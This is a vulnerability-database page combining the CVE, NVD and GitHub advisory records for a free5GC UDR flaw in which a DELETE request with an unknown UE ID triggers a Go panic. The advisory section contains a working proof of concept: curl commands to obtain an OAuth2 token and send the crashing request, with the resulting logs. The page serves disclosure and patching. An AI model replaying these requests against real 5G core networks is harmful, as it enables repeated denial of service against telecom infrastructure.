Vulnerability-Lookup

CVE-2026-44324 (GCVE-0-2026-44324)

Vulnerability from cvelistv5 – Published: 2026-05-27 15:44 – Updated: 2026-05-28 14:38

Title

free5GC: UDR nudr-dr DELETE amf-subscriptions panics on missing UE state via nil interface type assertion (single authenticated request)

Summary

free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2.

Severity

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-704 - Incorrect Type Conversion or Cast
CWE-754 - Improper Check for Unusual or Exceptional Conditions

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/free5gc/free5gc/security/advis…	x_refsource_CONFIRM
https://github.com/free5gc/free5gc/issues/920	x_refsource_MISC
https://github.com/free5gc/udr/pull/60	x_refsource_MISC
https://github.com/free5gc/udr/commit/8a1d3c63be9…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
free5gc	free5gc	Affected: < 4.2.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44324",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-28T14:38:03.211329Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-28T14:38:09.624Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63"
          },
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/free5gc/free5gc/issues/920"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "free5gc",
          "vendor": "free5gc",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.2.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC\u0027s UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-704",
              "description": "CWE-704: Incorrect Type Conversion or Cast",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-754",
              "description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-27T15:44:27.616Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63"
        },
        {
          "name": "https://github.com/free5gc/free5gc/issues/920",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/free5gc/free5gc/issues/920"
        },
        {
          "name": "https://github.com/free5gc/udr/pull/60",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/free5gc/udr/pull/60"
        },
        {
          "name": "https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99"
        }
      ],
      "source": {
        "advisory": "GHSA-jqfc-gwj5-3w63",
        "discovery": "UNKNOWN"
      },
      "title": "free5GC: UDR nudr-dr DELETE amf-subscriptions panics on missing UE state via nil interface type assertion (single authenticated request)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44324",
    "datePublished": "2026-05-27T15:44:27.616Z",
    "dateReserved": "2026-05-05T19:00:06.023Z",
    "dateUpdated": "2026-05-28T14:38:09.624Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-44324",
      "date": "2026-06-06",
      "epss": "0.00067",
      "percentile": "0.20983"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44324\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-27T17:16:37.767\",\"lastModified\":\"2026-05-28T16:52:20.007\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC\u0027s UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-704\"},{\"lang\":\"en\",\"value\":\"CWE-754\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:free5gc:free5gc:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.2.2\",\"matchCriteriaId\":\"EF7EBB95-EB4E-44C5-BF0A-9C99B0A7775F\"}]}]}],\"references\":[{\"url\":\"https://github.com/free5gc/free5gc/issues/920\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Issue Tracking\"]},{\"url\":\"https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/free5gc/udr/pull/60\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/free5gc/free5gc/issues/920\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Issue Tracking\"]},{\"url\":\"https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44324\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-28T14:38:03.211329Z\"}}}], \"references\": [{\"url\": \"https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63\", \"tags\": [\"exploit\"]}, {\"url\": \"https://github.com/free5gc/free5gc/issues/920\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-28T14:37:51.215Z\"}}], \"cna\": {\"title\": \"free5GC: UDR nudr-dr DELETE amf-subscriptions panics on missing UE state via nil interface type assertion (single authenticated request)\", \"source\": {\"advisory\": \"GHSA-jqfc-gwj5-3w63\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"free5gc\", \"product\": \"free5gc\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.2.2\"}]}], \"references\": [{\"url\": \"https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63\", \"name\": \"https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/free5gc/free5gc/issues/920\", \"name\": \"https://github.com/free5gc/free5gc/issues/920\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/free5gc/udr/pull/60\", \"name\": \"https://github.com/free5gc/udr/pull/60\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99\", \"name\": \"https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC\u0027s UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-704\", \"description\": \"CWE-704: Incorrect Type Conversion or Cast\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-754\", \"description\": \"CWE-754: Improper Check for Unusual or Exceptional Conditions\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-27T15:44:27.616Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-44324\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-28T14:38:09.624Z\", \"dateReserved\": \"2026-05-05T19:00:06.023Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-27T15:44:27.616Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-44324

Vulnerability from fkie_nvd - Published: 2026-05-27 17:16 - Updated: 2026-05-28 16:52

Severity

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/free5gc/free5gc/issues/920	Exploit, Issue Tracking
security-advisories@github.com	https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63	Exploit, Vendor Advisory
security-advisories@github.com	https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99	Patch
security-advisories@github.com	https://github.com/free5gc/udr/pull/60	Issue Tracking, Patch
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/free5gc/free5gc/issues/920	Exploit, Issue Tracking
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	free5gc	free5gc	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:free5gc:free5gc:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF7EBB95-EB4E-44C5-BF0A-9C99B0A7775F",
              "versionEndExcluding": "4.2.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC\u0027s UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable. This vulnerability is fixed in 4.2.2."
    }
  ],
  "id": "CVE-2026-44324",
  "lastModified": "2026-05-28T16:52:20.007",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-27T17:16:37.767",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://github.com/free5gc/free5gc/issues/920"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://github.com/free5gc/udr/pull/60"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://github.com/free5gc/free5gc/issues/920"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-704"
        },
        {
          "lang": "en",
          "value": "CWE-754"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-JQFC-GWJ5-3W63

Vulnerability from github – Published: 2026-05-08 22:52 – Updated: 2026-05-08 22:52

Summary

free5GC's UDR nudr-dr DELETE amf-subscriptions panics on missing UE state via nil interface type assertion (single authenticated request)

Details

Summary

free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable.

This is the no-precondition sibling of free5gc/free5gc#919: same handler, same bug pattern (set pd, do not return, then dereference), but the panic site is the nil-interface type assertion at line 61 instead of the nil-pointer deref at line 69. No earlier EE-subscription create is required.

This endpoint requires a valid nudr-dr OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.

Details

Validated against the UDR container in the official Docker compose lab. - Source repo tag: v4.2.1 - Running Docker image: free5gc/udr:v4.2.1 - Runtime UDR commit: 754d23b0 - Docker validation date: 2026-03-22 - UDR endpoint: http://10.100.200.11:8000

Vulnerable handler (the ok miss path sets pd but does not return; the next line type-asserts the nil interface):

subsId := c.Params.ByName("subsId")
s.Processor().RemoveAmfSubscriptionsInfoProcedure(c, subsId, ueId)

In the processor:

value, ok := udrSelf.UESubsCollection.Load(ueId)
if !ok {
    pd = util.ProblemDetailsNotFound("USER_NOT_FOUND")
}

UESubsData := value.(*udr_context.UESubsData)   // panics: nil interface

When ueId is absent from UESubsCollection, value is the nil interface{} returned by sync.Map.Load, and value.(*udr_context.UESubsData) panics with:

panic: interface conversion: interface {} is nil, not *context.UESubsData

Code evidence (paths in free5gc/udr): - Route exposure + handler dispatch: - NFs/udr/internal/sbi/api_datarepository.go:2161 - NFs/udr/internal/sbi/api_datarepository.go:2170 - NFs/udr/internal/sbi/api_datarepository.go:2172 - Panic root cause (nil interface type assertion): - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:53 - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:56 - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:61

PoC

Reproduced end-to-end against the running UDR at http://10.100.200.11:8000 -- single authenticated request, no preconditions.

Restart UDR (clean state -- proves no precondition is needed):

docker restart udr

Obtain a valid nudr-dr token from NRF:

curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=UDR&scope=nudr-dr'

Trigger the panic with one DELETE for a nonexistent ueId=x:

curl -i -sS -X DELETE \
  'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
  -H 'Authorization: Bearer <valid_nudr_dr_jwt>'

HTTP/1.1 500 Internal Server Error
Content-Length: 0

UDR container logs (docker logs udr) confirm the nil-interface conversion panic at event_amf_subscription_info_document.go:61 inside RemoveAmfSubscriptionsInfoProcedure:

[ERRO][UDR][GIN] panic: interface conversion: interface {} is nil, not *context.UESubsData
github.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure
    .../event_amf_subscription_info_document.go:61
github.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo
    .../api_datarepository.go:2172
[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |

Impact

Incorrect type conversion on a nil interface (CWE-704) inside an authenticated UDR data-repository handler, caused by improper handling of the missing-ueId branch (CWE-754): the handler sets a 404 problem-details value but does not return, then runs a Go type assertion on the nil interface returned by sync.Map.Load.

This is NOT framed as an auth-bypass finding: the endpoint requires a valid nudr-dr OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can: - Trigger a reliable, single-request panic on the amf-subscriptions delete route against a fresh UDR (no preparatory state needed -- this is strictly easier than free5gc/free5gc#919). - Repeat the trigger to sustain a per-request panic-DoS on UDR's data-repository surface, with each panic costing more CPU + log writes than the intended 404 USER_NOT_FOUND response would have.

No Confidentiality impact (the response is 500 with empty body). No Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation (Gin recovers; the UDR process keeps running).

Affected: free5gc v4.2.1.

Upstream issue: https://github.com/free5gc/free5gc/issues/920 Upstream fix: https://github.com/free5gc/udr/pull/60

Severity

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/free5gc/udr"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-704",
      "CWE-754"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T22:52:20Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nfree5GC\u0027s UDR `nudr-dr` `DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions` handler panics on a single authenticated request against a fresh UDR instance when the supplied `ueId` does not exist in `UESubsCollection`. The processor checks `value, ok := udrSelf.UESubsCollection.Load(ueId)` and sets a `404 USER_NOT_FOUND` problem-details on the miss path, but execution continues and immediately runs `value.(*udr_context.UESubsData)` -- a Go type assertion on a nil interface, which panics with `interface conversion: interface {} is nil, not *context.UESubsData`. Gin recovery converts the panic into `HTTP 500`, but the endpoint remains repeatedly panicable.\n\nThis is the no-precondition sibling of free5gc/free5gc#919: same handler, same bug pattern (set `pd`, do not return, then dereference), but the panic site is the nil-interface type assertion at line 61 instead of the nil-pointer deref at line 69. No earlier EE-subscription create is required.\n\nThis endpoint requires a valid `nudr-dr` OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.\n\n### Details\nValidated against the UDR container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- Running Docker image: `free5gc/udr:v4.2.1`\n- Runtime UDR commit: `754d23b0`\n- Docker validation date: 2026-03-22\n- UDR endpoint: `http://10.100.200.11:8000`\n\nVulnerable handler (the `ok` miss path sets `pd` but does not return; the next line type-asserts the nil interface):\n```go\nsubsId := c.Params.ByName(\"subsId\")\ns.Processor().RemoveAmfSubscriptionsInfoProcedure(c, subsId, ueId)\n```\nIn the processor:\n```go\nvalue, ok := udrSelf.UESubsCollection.Load(ueId)\nif !ok {\n    pd = util.ProblemDetailsNotFound(\"USER_NOT_FOUND\")\n}\n\nUESubsData := value.(*udr_context.UESubsData)   // panics: nil interface\n```\nWhen `ueId` is absent from `UESubsCollection`, `value` is the nil `interface{}` returned by `sync.Map.Load`, and `value.(*udr_context.UESubsData)` panics with:\n```\npanic: interface conversion: interface {} is nil, not *context.UESubsData\n```\n\nCode evidence (paths in `free5gc/udr`):\n- Route exposure + handler dispatch:\n  - `NFs/udr/internal/sbi/api_datarepository.go:2161`\n  - `NFs/udr/internal/sbi/api_datarepository.go:2170`\n  - `NFs/udr/internal/sbi/api_datarepository.go:2172`\n- Panic root cause (nil interface type assertion):\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:53`\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:56`\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:61`\n\n### PoC\nReproduced end-to-end against the running UDR at `http://10.100.200.11:8000` -- single authenticated request, no preconditions.\n\n1. Restart UDR (clean state -- proves no precondition is needed):\n```\ndocker restart udr\n```\n\n2. Obtain a valid `nudr-dr` token from NRF:\n```\ncurl -sS -X POST \u0027http://10.100.200.3:8000/oauth2/token\u0027 \\\n  -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n  --data \u0027grant_type=client_credentials\u0026nfType=NEF\u0026nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57\u0026targetNfType=UDR\u0026scope=nudr-dr\u0027\n```\n\n3. Trigger the panic with one DELETE for a nonexistent `ueId=x`:\n```\ncurl -i -sS -X DELETE \\\n  \u0027http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions\u0027 \\\n  -H \u0027Authorization: Bearer \u003cvalid_nudr_dr_jwt\u003e\u0027\n```\n```\nHTTP/1.1 500 Internal Server Error\nContent-Length: 0\n```\n\n4. UDR container logs (`docker logs udr`) confirm the nil-interface conversion panic at `event_amf_subscription_info_document.go:61` inside `RemoveAmfSubscriptionsInfoProcedure`:\n```\n[ERRO][UDR][GIN] panic: interface conversion: interface {} is nil, not *context.UESubsData\ngithub.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure\n    .../event_amf_subscription_info_document.go:61\ngithub.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo\n    .../api_datarepository.go:2172\n[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |\n```\n\n### Impact\nIncorrect type conversion on a nil interface (CWE-704) inside an authenticated UDR data-repository handler, caused by improper handling of the missing-ueId branch (CWE-754): the handler sets a `404` problem-details value but does not return, then runs a Go type assertion on the nil interface returned by `sync.Map.Load`.\n\nThis is NOT framed as an auth-bypass finding: the endpoint requires a valid `nudr-dr` OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can:\n- Trigger a reliable, single-request panic on the `amf-subscriptions` delete route against a fresh UDR (no preparatory state needed -- this is strictly easier than free5gc/free5gc#919).\n- Repeat the trigger to sustain a per-request panic-DoS on UDR\u0027s data-repository surface, with each panic costing more CPU + log writes than the intended `404 USER_NOT_FOUND` response would have.\n\nNo Confidentiality impact (the response is `500` with empty body). No Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation (Gin recovers; the UDR process keeps running).\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/920\nUpstream fix: https://github.com/free5gc/udr/pull/60",
  "id": "GHSA-jqfc-gwj5-3w63",
  "modified": "2026-05-08T22:52:20Z",
  "published": "2026-05-08T22:52:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/issues/920"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/udr/pull/60"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/free5gc/free5gc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "free5GC\u0027s UDR nudr-dr DELETE amf-subscriptions panics on missing UE state via nil interface type assertion (single authenticated request)"
}

Sightings

